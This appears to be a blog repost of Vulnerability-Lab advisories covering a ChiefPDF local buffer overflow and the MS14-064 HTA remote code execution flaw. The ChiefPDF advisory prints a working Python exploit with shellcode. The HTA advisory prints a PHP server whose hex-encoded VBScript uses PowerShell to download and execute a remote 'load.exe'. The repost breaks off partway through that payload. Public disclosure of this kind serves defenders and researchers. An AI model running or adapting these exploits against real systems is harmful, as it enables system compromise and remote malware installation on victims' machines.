Members ... Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] ChiefPDF Software v2.x - Buffer Overflow Vulnerability

Document Title: =============== ChiefPDF Software v2.x - Buffer Overflow Vulnerability References (Source): ==================== http://ift.tt/1gYp7j8 Release Date: ============= 2015-08-20 Vulnerability Laboratory ID (VL-ID): ==================================== 1578 Common Vulnerability Scoring System: ==================================== 7.3 Product & Service Introduction: =============================== High Volume Batch OCR Conversion. High Performance TIFF to PDF OCR.‎ High-Volume Tiff To PDF Conversions. Find Out How Easy it Can Be!‎ Convert scanned documents & images. Searchable PDF. (Copy of the Vendor Homepage: http://www.chiefpdf.com & http://ift.tt/1NnrI3V) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a local buffer overflow vulnerability in the official ChiefPDF Software Clients v2.0. Vulnerability Disclosure Timeline: ================================== 2015-08-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ChiefPDF Software Product: PDF to Image Converter PDF to Image Converter Free, PDF to Tiff Converter & PDF 2.0 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official ChiefPDF Software Clients v2.0. The buffer overflow vulnerability can be exploited by local attackers to compromise a target system or to gain higher access privileges for further exploitation. The buffer overflow vulnerability is located in the `Registration - License Name` input field of the software client. The issue is a classic unicode buffer overflow vulnerability that allows an attacker to compromise the local system. The vulnerability can be exploited in all software clients like the PDF to Image Converter 2.0, PDF to Image Converter Free 2.0, PDF to Tiff Converter 2.0 and PDF to Tiff Converter Free 2.0. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.3. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability results in system compromise by elevation of privileges via overwrite of the registers. Vulnerable Module(s): [+] Registration - License Name Vulnerable Program(s): [+] PDF to Image Converter 2.0 [+] PDF to Image Converter Free 2.0 [+] PDF to Tiff Converter 2.0 [+] PDF to Tiff Converter Free 2.0 Proof of Concept (PoC): ======================= The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. PoC: ChiefPDF.py #!/usr/bin/python #Exploit Title:ChiefPDF Software Buffer Overflow #vulnerable programs: #PDF to Image Converter 2.0 #PDF to Image Converter Free 2.0 #PDF to Tiff Converter 2.0 #PDF to Tiff Converter Free 2.0 #Software Link:http://ift.tt/1NnrI3V #Author: metacom - twitter.com/m3tac0m #Tested on: Win-Xp-sp3, Win-7, Win-8.1 #How to use: Copy the AAAA...+ string from regkey.txt and paste -> Registration - License Name: (input) buffer="A" * 544 buffer+="\xeb\x06\x90\x90" buffer+="\x8B\x89\x03\x10"# 1003898B 5E POP ESI buffer+="\x90" * 80 buffer+=("\xba\x50\x3e\xf5\xa5\xda\xd7\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" "\x33\x83\xc3\x04\x31\x53\x0e\x03\x03\x30\x17\x50\x5f\xa4\x5e" "\x9b\x9f\x35\x01\x15\x7a\x04\x13\x41\x0f\x35\xa3\x01\x5d\xb6" "\x48\x47\x75\x4d\x3c\x40\x7a\xe6\x8b\xb6\xb5\xf7\x3d\x77\x19" "\x3b\x5f\x0b\x63\x68\xbf\x32\xac\x7d\xbe\x73\xd0\x8e\x92\x2c" "\x9f\x3d\x03\x58\xdd\xfd\x22\x8e\x6a\xbd\x5c\xab\xac\x4a\xd7" "\xb2\xfc\xe3\x6c\xfc\xe4\x88\x2b\xdd\x15\x5c\x28\x21\x5c\xe9" "\x9b\xd1\x5f\x3b\xd2\x1a\x6e\x03\xb9\x24\x5f\x8e\xc3\x61\x67" "\x71\xb6\x99\x94\x0c\xc1\x59\xe7\xca\x44\x7c\x4f\x98\xff\xa4" "\x6e\x4d\x99\x2f\x7c\x3a\xed\x68\x60\xbd\x22\x03\x9c\x36\xc5" "\xc4\x15\x0c\xe2\xc0\x7e\xd6\x8b\x51\xda\xb9\xb4\x82\x82\x66" "\x11\xc8\x20\x72\x23\x93\x2e\x85\xa1\xa9\x17\x85\xb9\xb1\x37" "\xee\x88\x3a\xd8\x69\x15\xe9\x9d\x86\x5f\xb0\xb7\x0e\x06\x20" "\x8a\x52\xb9\x9e\xc8\x6a\x3a\x2b\xb0\x88\x22\x5e\xb5\xd5\xe4" "\xb2\xc7\x46\x81\xb4\x74\x66\x80\xd6\x1b\xf4\x48\x37\xbe\x7c" "\xea\x47") file = open('regkey.txt','wb') file.write(buffer); file.close() Security Risk: ============== The security risk of the local buffer overflow vulnerability in the chiefpdf software clients is estimated as high. (CVSS 7.3) Credits & Authors: ================== metacom - [http://ift.tt/1ROW2Et] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] PDF Shaper v3.5 - (MSF) Remote Buffer Overflow Vulnerability

[FD] Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)

Document Title: =============== Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064) References (Source): ==================== http://ift.tt/1TVatLt Video: http://youtu.be/Vkswz7vt23M http://ift.tt/1sAsDia CVE-ID: ======= CVE-2014-6332 Release Date: ============= 2015-08-15 Vulnerability Laboratory ID (VL-ID): ==================================== 1576 Common Vulnerability Scoring System: ==================================== 9.3 Abstract Advisory Information: ============================== The Vulnerability Laboratory discovered remote code execution vulnerability in the Microsoft HTA (HTML Application) - MS14-064. Vulnerability Disclosure Timeline: ================================== 2015-08-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka Windows OLE Automation Array Remote Code Execution Vulnerability. Proof of Concept (PoC): ======================= The vulnerbility can be exploited by remote attackers without user interaction or privilege application user accounts. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce ... 1 . Run php code : php hta.php 2 . Copy this php output (HTML) and Paste as poc.hta (Replace ip) 3 . Open poc.hta 4 . Your Link Download/Execute on your target 5 . Finished ;) #!/usr/bin/php poc'."\n\n"; $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); $msgd = "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76". "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65". "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68". "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20". "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63". "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75". "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20". "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62". "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22". "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65". "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65". "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61". "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c". "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d". "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53". "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b". "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70". "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e". "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61". "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73". "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55". "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d". "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61". "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78". "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20". "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a". "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28". "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a". "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a". "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65". "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20". "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69". "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22". "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e". "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20". "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f". "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65". "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a". "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61". "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68". "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30". "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72". "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61". "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68". "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28". "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f". "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75". "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69". "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e". "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29". "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d". "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69". "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f". "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33". "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e". "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66". "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20". "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72". "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76". "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43". "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20". "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74". "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74". "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e". "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45". "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69". "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32". "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a". "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30". "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d". "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61". "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34". "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61". "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50". "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75". "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20". "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e". "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20". "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28". "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20". "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20". "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b". "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e". "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64". "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28". "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20". "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68". "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20". "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37". "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75". "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d". "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20". "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20". "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33". "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30". "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20". "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20". "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30". "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20". "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65". "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74". "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34". "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38". "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28". "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d". "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29". "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69". 